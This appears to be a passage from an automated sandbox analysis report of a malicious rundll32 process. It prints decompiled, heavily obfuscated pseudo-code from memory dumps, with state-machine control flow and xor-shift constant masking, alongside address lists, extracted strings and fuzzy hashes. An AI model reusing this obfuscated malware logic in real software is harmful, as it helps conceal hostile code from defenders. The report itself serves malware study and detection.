							if(_t267 >= _t230) {
								goto L17;
							}
						}
					}
					_t265 = 0x8e8e3cb;
					L19:
					__eflags = _t265 - 0x8e8e3cb;
				} while (__eflags != 0);
				L20:
				return _t239;
			}

0x00435f04
0x00435f0a
0x00435f1e
0x00435f1f
0x00435f23
0x00435f26
0x00435f27
0x00435f2c
0x00435f2d
0x00435f3a
0x00435f3e
0x00435f43
0x00435f4b
0x00435f5b
0x00435f5f
0x00435f64
0x00435f69
0x00435f6e
0x00435f76
0x00435f7e
0x00435f86
0x00435f8e
0x00435f96
0x00435f9e
0x00435fa6
0x00435fae
0x00435fb6
0x00435fbe
0x00435fc6
0x00435fce
0x00435fd6
0x00435fde
0x00435fe6
0x00435ff2
0x00435ff7
0x00435ffd
0x00436005
0x0043600d
0x00436015
0x0043601d
0x00436025
0x0043602a
0x00436032
0x0043603a
0x00436042
0x0043604a
0x00436052
0x0043605a
0x00436062
0x0043606e
0x00436071
0x0043607a
0x0043607e
0x00436086
0x0043608e
0x00436092
0x0043609a
0x004360a2
0x004360aa
0x004360b2
0x004360b7
0x004360bf
0x004360c7
0x004360d1
0x004360db
0x004360e3
0x004360eb
0x004360f3
0x004360f8
0x00436100
0x0043610e
0x00436113
0x00436119
0x00436121
0x00436129
0x00436131
0x0043613e
0x00436141
0x00436145
0x0043614d
0x00436155
0x0043615d
0x00436165
0x0043616d
0x00436172
0x0043617a
0x00436182
0x0043618a
0x0043619a
0x0043619e
0x004361a2
0x004361a6
0x004361a7
0x004361a9
0x004361ad
0x004361b5
0x004361bd
0x004361ca
0x004361ce
0x004361d3
0x004361db
0x004361e3
0x004361eb
0x004361f3
0x004361fb
0x00436203
0x00436203
0x00436215
0x0043632b
0x00000000
0x0043621b
0x00436221
0x004362fd
0x0043630b
0x00436311
0x0043631b
0x0043631f
0x00436321
0x00436326
0x00000000
0x00436227
0x0043622d
0x004362b5
0x004362ba
0x004362c5
0x004362c9
0x004362ce
0x004362d1
0x004362d3
0x004362d9
0x00000000
0x004362d9
0x00436233
0x00436239
0x00436297
0x004362a4
0x004362aa
0x004362ab
0x00000000
0x0043623b
0x00436241
0x00000000
0x00436247
0x00436247
0x0043626e
0x00436272
0x00436276
0x0043627b
0x0043627d
0x00436283
0x00436289
0x00000000
0x00436289
0x00436283
0x00436241
0x00436239
0x0043622d
0x00436221
0x00000000
0x00436215
0x00436335
0x0043633e
0x00436345
0x00436349
0x00436350
0x00436352
0x00436354
0x0043635a
0x0043635c
0x0043635c
0x00436356
0x00436356
0x00436358
0x00000000
0x00000000
0x00436358
0x00436354
0x0043635d
0x0043635f
0x0043635f
0x0043635f
0x0043636a
0x00436373

Strings

c^, xrefs: 00435F86
.vl, xrefs: 004361F3
)), xrefs: 00435FA6
mv, xrefs: 00435FFD
VE, xrefs: 0043604A
$z, xrefs: 00435FD6
uq, xrefs: 004360F8

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .vl$$z$))$VE$c^$mv$uq
API String ID: 0-129554973
Opcode ID: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
Instruction ID: 43d65235d9445a3639b694a4e1385b654d957b3cff3de80eaf9e47c9b1dcd8c1
Opcode Fuzzy Hash: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
Instruction Fuzzy Hash: 48B12472908342AFE368CF25C48990FBBF1BBC5718F019A1DF995562A0D3B98909CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00175478, Relevance: 9.0, Strings: 7, Instructions: 237COMMON

Download Yara Rule

Strings

c^, xrefs: 001754FA
mv, xrefs: 00175571
$z, xrefs: 0017554A
VE, xrefs: 001755BE
uq, xrefs: 0017566C
.vl, xrefs: 00175767
)), xrefs: 0017551A

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .vl$$z$))$VE$c^$mv$uq
API String ID: 0-129554973
Opcode ID: df02dcf10120f5ed3c1aa02081fe2585210939953c6582f116513764aba39f46
Instruction ID: 5d6812181bb21d7231b19e495562a64601f61495dc31581138ee654fcfc4d153
Opcode Fuzzy Hash: df02dcf10120f5ed3c1aa02081fe2585210939953c6582f116513764aba39f46
Instruction Fuzzy Hash: 56B133725083819FE368CF25C48951BBBF2BBC5718F508A1CF5D9962A0D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0044434E, Relevance: 8.9, Strings: 7, Instructions: 199
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0044434E() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t172;
				signed int _t176;
				void* _t179;
				void* _t200;
				intOrPtr _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t214;
				signed int* _t216;

				_t216 =  &_v80;
				_v16 = 0x14d035;
				_v12 = 0x6b8268;
				_t179 = 0xb19f7ca;
				_t206 = 0;
				_v8 = 0;
				_v4 = 0;
				_v32 = 0x3622;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x000106c4;
				_v40 = 0x4e9a;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000001e1;
				_v80 = 0xc10;
				_v80 = _v80 >> 9;
				_t207 = 0x7c;
				_v80 = _v80 / _t207;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x0000249f;
				_v64 = 0x9f18;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 + 0xffff1ff5;
				_v64 = _v64 | 0x0b80b4b6;
				_v64 = _v64 ^ 0xffff9b0d;
				_v36 = 0x945d;
				_v36 = _v36 + 0xffff610d;
				_v36 = _v36 ^ 0xffffd8f7;
				_v48 = 0x2aad;
				_t208 = 0x7f;
				_v48 = _v48 / _t208;
				_v48 = _v48 ^ 0x00003e6e;
				_v56 = 0xddc4;
				_t209 = 0x5e;
				_v56 = _v56 * 0x14;
				_v56 = _v56 + 0xffff71f7;
				_v56 = _v56 ^ 0x001091c0;
				_v68 = 0xa802;
				_v68 = _v68 ^ 0x67e8667b;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 * 0x47;
				_v68 = _v68 ^ 0x01cd2f8d;
				_v52 = 0xc142;
				_v52 = _v52 * 0x44;
				_v52 = _v52 ^ 0x822744f1;
				_v52 = _v52 ^ 0x82146dfa;
				_v72 = 0xbd15;
				_v72 = _v72 / _t209;
				_v72 = _v72 ^ 0x12aa425e;
				_v72 = _v72 | 0x2ffcb14d;
				_v72 = _v72 ^ 0x3ffeb451;
				_v76 = 0x6e7b;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 >> 3;
				_v76 = _v76 / _t209;
				_v76 = _v76 ^ 0x00006fef;
				_v20 = 0x31f;
				_v20 = _v20 | 0xb0d9e19e;
				_v20 = _v20 ^ 0xb0d9bf73;
				_v60 = 0x7aa7;
				_t178 = _v20;
				_t210 = 0x41;
				_v60 = _v60 / _t210;
				_t211 = 0x59;
				_t215 = _v20;
				_v60 = _v60 * 0x36;
				_t212 = _v20;
				_v60 = _v60 / _t211;
				_v60 = _v60 ^ 0x0000613c;
				_v24 = 0x73cc;
				_v24 = _v24 >> 0xc;
				_v24 = _v24 ^ 0x00003ffa;
				_v28 = 0xa6c1;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x0000757c;
				_v44 = 0x6c53;
				_v44 = _v44 | 0xc78368a0;
				_v44 = _v44 ^ 0xc78c6ccc;
				while(1) {
					L1:
					_t200 = 0x5c;
					do {
						L2:
						while(_t179 != 0xa00144c) {
							if(_t179 == 0xb19f7ca) {
								_t179 = 0x2b2ed007;
								continue;
							} else {
								if(_t179 == 0xbc9e916) {
									E00435AB8(_v20, _v60, _v24, _v28, _t178);
								} else {
									if(_t179 == 0x118767b3) {
										E00435AB8(_v68, _v52, _v72, _v76, _t215);
										_t216 =  &(_t216[3]);
										_t179 = 0xbc9e916;
										while(1) {
											L1:
											_t200 = 0x5c;
											goto L2;
										}
									} else {
										if(_t179 == 0x2b2ed007) {
											_t214 =  *0x451088 + 0x38;
											while( *_t214 != _t200) {
												_t214 = _t214 + 2;
											}
											_t212 = _t214 + 2;
											_t179 = 0x39878866;
											continue;
										} else {
											if(_t179 == 0x39878866) {
												_t176 = E0044340E(_v40, _v80, _t179, _t179, _v44);
												_t178 = _t176;
												_t216 =  &(_t216[3]);
												if(_t176 != 0) {
													_t179 = 0xa00144c;
													while(1) {
														L1:
														_t200 = 0x5c;
														goto L2;
													}
												}
											} else {
												if(_t179 != 0x3a731069) {
													goto L21;
												} else {
													E0043FF0D(_v48, _v56, _t215);
													_t206 =  !=  ? 1 : _t206;
													_t179 = 0x118767b3;
													while(1) {
														L1:
														_t200 = 0x5c;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L24:
							return _t206;
						}
						_t172 = E00440321(_t178, _v32, _v64, _v36, _t212);
						_t215 = _t172;
						_t216 =  &(_t216[3]);
						if(_t172 == 0) {
							_t179 = 0xbc9e916;
							_t200 = 0x5c;
							goto L21;
						} else {
							_t179 = 0x3a731069;
							goto L1;
						}
						goto L24;
						L21:
					} while (_t179 != 0x1689c33b);
					goto L24;
				}
			}

0x0044434e
0x00444351
0x0044435b
0x00444363
0x0044436c
0x0044436e
0x00444372
0x00444376
0x0044437e
0x00444383
0x0044438b
0x00444393
0x00444398
0x004443a0
0x004443a8
0x004443b3
0x004443b8
0x004443bc
0x004443c1
0x004443c9
0x004443d1
0x004443d6
0x004443de
0x004443e6
0x004443ee
0x004443f6
0x004443fe
0x00444406
0x00444414
0x00444419
0x0044441d
0x00444425
0x00444434
0x00444435
0x00444439
0x00444441
0x00444449
0x00444451
0x00444459
0x00444463
0x00444467
0x0044446f
0x0044447c
0x00444480
0x00444488
0x00444490
0x004444a0
0x004444a4
0x004444ac
0x004444b4
0x004444bc
0x004444c4
0x004444c9
0x004444d4
0x004444d8
0x004444e0
0x004444e8
0x004444f0
0x004444f8
0x00444508
0x0044450c
0x00444511
0x0044451c
0x0044451d
0x00444521
0x0044452b
0x0044452f
0x00444533
0x0044453b
0x00444543
0x00444548
0x00444550
0x00444558
0x0044455d
0x00444565
0x0044456d
0x00444575
0x0044457d
0x0044457d
0x0044457f
0x00444580
0x00000000
0x00444580
0x00444592
0x00444657
0x00000000
0x00444598
0x0044459e
0x004446af
0x004445a4
0x004445aa
0x00444645
0x0044464a
0x0044464d
0x0044457d
0x0044457d
0x0044457f
0x00000000
0x0044457f
0x004445b0
0x004445b6
0x0044461a
0x00444622
0x0044461f
0x0044461f
0x00444627
0x0044462a
0x00000000
0x004445b8
0x004445be
0x004445f8
0x004445fd
0x004445ff
0x00444604
0x0044460a
0x0044457d
0x0044457d
0x0044457f
0x00000000
0x0044457f
0x0044457d
0x004445c0
0x004445c6
0x00000000
0x004445cc
0x004445d5
0x004445e0
0x004445e3
0x0044457d
0x0044457d
0x0044457f
0x00000000
0x0044457f
0x0044457d
0x004445c6
0x004445be
0x004445b6
0x004445aa
0x0044459e
0x004446b7
0x004446c0
0x004446c0
0x00444670
0x00444675
0x00444677
0x0044467c
0x0044468a
0x0044468f
0x00000000
0x0044467e
0x0044467e
0x00000000
0x0044467e
0x00000000
0x00444690
0x00444690
0x00000000
0x0044469c

Strings

{fg, xrefs: 00444451
"6, xrefs: 00444376
|u, xrefs: 0044455D
o, xrefs: 004444D8
<a, xrefs: 00444533
Sl, xrefs: 00444565
n>, xrefs: 0044441D

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "6$<a$Sl$n>${fg$|u$o
API String ID: 0-4282296459
Opcode ID: 71a4021e8a26f9ff87355d7decce2ec63f1b94ce53ac38d2412815d01ef232e9
Instruction ID: 8f293b05d19340c9174d6daae5c990d52fc118a16242513ebe349cf70bd0fe0c
Opcode Fuzzy Hash: 71a4021e8a26f9ff87355d7decce2ec63f1b94ce53ac38d2412815d01ef232e9
Instruction Fuzzy Hash: 818196705083419FE318CF25C98551BFBF1BBD5358F044A1EF68A962A0C7B98A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 001838C2, Relevance: 8.9, Strings: 7, Instructions: 199COMMON

Download Yara Rule

Strings

n>, xrefs: 00183991
o, xrefs: 00183A4C
|u, xrefs: 00183AD1
{fg, xrefs: 001839C5
"6, xrefs: 001838EA
Sl, xrefs: 00183AD9
<a, xrefs: 00183AA7

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "6$<a$Sl$n>${fg$|u$o
API String ID: 0-4282296459
Opcode ID: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
Instruction ID: 7ca77ea12c0432f58e68c883bbfbeaabe8dcf3846088b44ea754c70a3b78ca24
Opcode Fuzzy Hash: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
Instruction Fuzzy Hash: 6A8185715083419FD318DF25C98A41BFBF2FBD4758F084A1EF59A962A0C7B58A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0043ECFE, Relevance: 8.9, Strings: 7, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0043ECFE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t116;
				signed int _t127;
				void* _t129;
				void* _t138;
				signed int* _t141;

				_push(_a20);
				_push(0xffffffff);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t116);
				_v20 = 0x26c0;
				_t141 =  &(( &_v56)[7]);
				_v20 = _v20 ^ 0x5664ed39;
				_t138 = 0;
				_v20 = _v20 ^ 0x56649557;
				_t129 = 0x182a63aa;
				_v48 = 0x49af;
				_v48 = _v48 + 0x9fa0;
				_v48 = _v48 ^ 0xbfb607f5;
				_v48 = _v48 | 0x3e98ce00;
				_v48 = _v48 ^ 0xbfbeae2a;
				_v44 = 0xe339;
				_v44 = _v44 << 8;
				_v44 = _v44 + 0xffffc89f;
				_v44 = _v44 ^ 0x00e37c5d;
				_v52 = 0x404f;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 * 6;
				_v52 = _v52 | 0x81baeb5b;
				_v52 = _v52 ^ 0x81bad7ee;
				_v24 = 0x7b81;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x000042e8;
				_v56 = 0x974b;
				_v56 = _v56 + 0xec91;
				_v56 = _v56 * 0x5d;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x00026e38;
				_v36 = 0x4dfa;
				_v36 = _v36 * 5;
				_v36 = _v36 + 0xe29b;
				_v36 = _v36 ^ 0x00025248;
				_v40 = 0xa60b;
				_v40 = _v40 * 0x3d;
				_v40 = _v40 + 0xffff1aad;
				_v40 = _v40 ^ 0x0026c01f;
				_v4 = 0xcf11;
				_v4 = _v4 + 0x8c52;
				_v4 = _v4 ^ 0x0001090b;
				_v28 = 0xbe78;
				_v28 = _v28 + 0xc58c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00002e12;
				_v8 = 0x6ce6;
				_v8 = _v8 + 0x5143;
				_v8 = _v8 ^ 0x0000f5d1;
				_t137 = _v4;
				_v12 = 0xe698;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x000e27c4;
				_v32 = 0x833d;
				_v32 = _v32 << 0xf;
				_v32 = _v32 + 0xb306;
				_v32 = _v32 ^ 0x419f4493;
				_v16 = 0x1ad3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x0d69ea92;
				while(_t129 != 0x182a63aa) {
					if(_t129 == 0x251a2d5f) {
						E0043F108(_v4, _v28, 0xffffffff, _a4, _a8, _v8, _t129, _v12, _t137, _t138, _v32, _v16);
					} else {
						if(_t129 == 0x2efe34a0) {
							_push(_t129);
							_t138 = E004354FB(_t137 + _t137);
							if(_t138 != 0) {
								_t129 = 0x251a2d5f;
								continue;
							}
						} else {
							if(_t129 != 0x34522f7d) {
								L10:
								if(_t129 != 0x226dac5d) {
									continue;
								} else {
								}
							} else {
								_t127 = E0043F108(_v20, _v48, 0xffffffff, _a4, _a8, _v44, _t129, _v52, 0, 0, _v24, _v56);
								_t137 = _t127;
								_t141 =  &(_t141[0xa]);
								if(_t127 != 0) {
									_t129 = 0x2efe34a0;
									continue;
								}
							}
						}
					}
					return _t138;
				}
				_t129 = 0x34522f7d;
				goto L10;
			}

0x0043ed04
0x0043ed08
0x0043ed0a
0x0043ed0c
0x0043ed10
0x0043ed14
0x0043ed15
0x0043ed16
0x0043ed1b
0x0043ed23
0x0043ed26
0x0043ed2e
0x0043ed30
0x0043ed38
0x0043ed3d
0x0043ed4a
0x0043ed52
0x0043ed5a
0x0043ed62
0x0043ed6a
0x0043ed72
0x0043ed77
0x0043ed7f
0x0043ed87
0x0043ed8f
0x0043ed99
0x0043ed9d
0x0043eda5
0x0043edad
0x0043edb5
0x0043edba
0x0043edc2
0x0043edca
0x0043edd7
0x0043eddb
0x0043ede0
0x0043ede8
0x0043edf5
0x0043edf9
0x0043ee01
0x0043ee09
0x0043ee16
0x0043ee1a
0x0043ee22
0x0043ee2a
0x0043ee32
0x0043ee3a
0x0043ee42
0x0043ee4a
0x0043ee52
0x0043ee57
0x0043ee5f
0x0043ee67
0x0043ee6f
0x0043ee77
0x0043ee7b
0x0043ee83
0x0043ee88
0x0043ee90
0x0043ee98
0x0043ee9d
0x0043eea5
0x0043eead
0x0043eeb5
0x0043eeba
0x0043eec2
0x0043eecc
0x0043ef6e
0x0043eece
0x0043eed4
0x0043ef25
0x0043ef2b
0x0043ef30
0x0043ef32
0x00000000
0x0043ef32
0x0043eed6
0x0043eedc
0x0043ef3b
0x0043ef41
0x00000000
0x00000000
0x0043ef47
0x0043eede
0x0043ef05
0x0043ef0a
0x0043ef0c
0x0043ef11
0x0043ef13
0x00000000
0x0043ef13
0x0043ef11
0x0043eedc
0x0043eed4
0x0043ef7e
0x0043ef7e
0x0043ef36
0x00000000

Strings

}/R4, xrefs: 0043EF36
O@, xrefs: 0043ED87
9dV, xrefs: 0043ED26
]|, xrefs: 0043ED7F
}/R4, xrefs: 0043EED6
CQ, xrefs: 0043EE67
B, xrefs: 0043EDBA

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9dV$CQ$O@$]|$}/R4$}/R4$B
API String ID: 0-3349067434
Opcode ID: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
Instruction ID: 106a2dad8cb02061bec2006486e20ccf707955bbc4d31970142c04ee8fb4a3d2
Opcode Fuzzy Hash: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
Instruction Fuzzy Hash: 34511372009341ABD758CF62C94981BFBE1BBC8768F505A0DF1A5562A0C3B9CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0017E272, Relevance: 8.9, Strings: 7, Instructions: 136COMMON

Download Yara Rule

Strings

]|, xrefs: 0017E2F3
}/R4, xrefs: 0017E44A
9dV, xrefs: 0017E29A
CQ, xrefs: 0017E3DB
}/R4, xrefs: 0017E4AA
B, xrefs: 0017E32E
O@, xrefs: 0017E2FB

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9dV$CQ$O@$]|$}/R4$}/R4$B
API String ID: 0-3349067434
Opcode ID: 0cc39ec3a623dc590d3e177852770837a0dcb3af5c9f1e4bbfbd1694e5cae751
Instruction ID: d27ad7c3b650e55872d60339e4e07562c0fdcc01aa90945299eaf2c50ca10911
Opcode Fuzzy Hash: 0cc39ec3a623dc590d3e177852770837a0dcb3af5c9f1e4bbfbd1694e5cae751
Instruction Fuzzy Hash: 48511772009341AFD758DF61C84981BBBF1BBD8768F548A0CF196562A0D3B9CA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0043F9BA, Relevance: 7.8, Strings: 6, Instructions: 288
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0043F9BA(void* __edx) {
				void* __ecx;
				void* _t230;
				intOrPtr* _t252;
				void* _t254;
				intOrPtr _t260;
				intOrPtr _t261;
				intOrPtr _t266;
				intOrPtr* _t272;
				void* _t274;
				signed int _t276;
				intOrPtr _t305;
				intOrPtr _t307;
				intOrPtr* _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				void* _t318;
				void* _t319;
				void* _t321;

				_t272 =  *((intOrPtr*)(_t318 + 0x80));
				_t308 =  *((intOrPtr*)(_t318 + 0x80));
				_push(_t272);
				_push( *((intOrPtr*)(_t318 + 0x8c)));
				_push(_t308);
				_push(__edx);
				E00442550(_t230);
				 *((intOrPtr*)(_t318 + 0x88)) = 0x1d8a34;
				_t319 = _t318 + 0x14;
				 *((intOrPtr*)(_t319 + 0x78)) = 0x5b8674;
				_t307 = 0;
				 *((intOrPtr*)(_t319 + 0x7c)) = 0;
				 *(_t319 + 0x28) = 0xb766;
				_t274 = 0x3039966c;
				_t309 = 0x72;
				 *(_t319 + 0x2c) =  *(_t319 + 0x28) / _t309;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 3;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 0xb;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0x0066fe1e;
				 *(_t319 + 0x28) = 0x26e;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x211d89c8;
				_t310 = 0x74;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) / _t310;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) >> 4;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x000485a3;
				 *(_t319 + 0x6c) = 0xe762;
				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) >> 1;
				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) ^ 0x00005f9f;
				 *(_t319 + 0x68) = 0xaff4;
				 *(_t319 + 0x68) =  *(_t319 + 0x68) + 0x7828;
				 *(_t319 + 0x68) =  *(_t319 + 0x68) ^ 0x0001439f;
				 *(_t319 + 0x34) = 0xcb25;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffb8d3;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xa;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffe26e;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff9e5a;
				 *(_t319 + 0x30) = 0xc32b;
				 *(_t319 + 0x30) =  *(_t319 + 0x30) | 0xe65bb1cf;
				_t311 = 0x26;
				 *(_t319 + 0x2c) =  *(_t319 + 0x30) / _t311;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfcdd71a1;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfad2c55c;
				 *(_t319 + 0x44) = 0x3fe0;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) + 0xffff9bb9;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x68f0e63f;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x970f0c5a;
				 *(_t319 + 0x60) = 0x8a37;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 6;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0022b94e;
				 *(_t319 + 0x34) = 0x571;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xe;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffff24df;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff3e5c;
				 *(_t319 + 0x4c) = 0x95d9;
				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) | 0xe7fe2ada;
				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) ^ 0xe7fea73a;
				 *(_t319 + 0x40) = 0x73df;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) * 0x6b;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x4d5f;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0030fb20;
				 *(_t319 + 0x20) = 0xe6ed;
				 *(_t319 + 0x20) =  *(_t319 + 0x20) >> 7;
				 *(_t319 + 0x20) =  *(_t319 + 0x20) * 0x63;
				_t312 = 0x6c;
				 *(_t319 + 0x24) =  *(_t319 + 0x20) / _t312;
				 *(_t319 + 0x24) =  *(_t319 + 0x24) ^ 0x000007c6;
				 *(_t319 + 0x40) = 0xf0c6;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x590f;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) << 2;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0005396a;
				 *(_t319 + 0x60) = 0x3771;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 0xe;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0ddc1ff2;
				 *(_t319 + 0x5c) = 0x9a5a;
				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) >> 6;
				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) ^ 0x000002fa;
				 *(_t319 + 0x58) = 0x55e2;
				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99e16a;
				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99b4e6;
				 *(_t319 + 0x18) = 0xddcf;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xffffd9e8;
				_t313 = 0x76;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) / _t313;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0ce3a4;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0c9dd3;
				 *(_t319 + 0x54) = 0x5bdd;
				 *(_t319 + 0x54) =  *(_t319 + 0x54) + 0xffd3;
				 *(_t319 + 0x54) =  *(_t319 + 0x54) ^ 0x000145b1;
				 *(_t319 + 0x3c) = 0x44f;
				_t314 = 0x66;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) / _t314;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a8254b5;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a825342;
				 *(_t319 + 0x14) = 0xc963;
				 *(_t319 + 0x14) =  *(_t319 + 0x14) + 0x81df;
				_t315 = 0x4e;
				 *(_t319 + 0x10) =  *(_t319 + 0x14) * 0x2c;
				 *(_t319 + 0x10) =  *(_t319 + 0x10) | 0x15242836;
				 *(_t319 + 0x10) =  *(_t319 + 0x10) ^ 0x153cd105;
				 *(_t319 + 0x1c) = 0xede;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) | 0xa2b3614c;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) * 0x5a;
				_t316 =  *((intOrPtr*)(_t319 + 0x70));
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) / _t315;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) ^ 0x00a7e5fc;
				 *(_t319 + 0x18) = 0x965c;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) << 8;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) * 0x27;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xc4fd;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0x16e8bc96;
				while(1) {
					_t251 =  *((intOrPtr*)(_t319 + 0x48));
					while(1) {
						L2:
						_t321 = _t274 - 0x239299c3;
						if(_t321 > 0) {
							break;
						}
						if(_t321 == 0) {
							E00440FE4(_t274,  *(_t319 + 0x6c));
